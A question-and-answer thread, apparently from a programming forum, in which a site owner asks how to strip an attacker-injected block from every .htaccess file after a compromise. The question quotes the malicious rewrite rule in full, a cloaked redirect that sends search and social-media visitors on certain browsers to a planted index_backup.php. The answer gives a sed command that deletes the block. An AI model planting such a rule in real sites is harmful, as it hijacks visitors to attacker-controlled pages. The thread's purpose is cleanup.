# How to remove a rule between tags from all .htaccess

Tags: .htaccess, sed

After an attack, following two file have been created in all the folders of my server:
`index_backup.php`
`.htaccess`

I remove all index_backup.php but I can't remove all the `.htaccess` because in some folder they are used.

How I can remove this rule in all `.htaccess` file?

```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
```

Comment: I've tried this sed -e 's/<IfModule mod_rewrite.c>.*>//g' .htaccess

Comment: For now I've make this: find /var/www/ -type f -exec sed -i 's/!\/index_backup/index_backup/g' .htaccess {} + That crash the rule that the attacker have add but I want delete all the content with a command but the same code the work for a line don't work for entire block

Answer (score 2, accepted):

```
sed -i -e '/<IfModule mod_rewrite\.c>/,/<\/IfModule>/d' .htaccess
```

this will remove the matched rule from .htaccess in place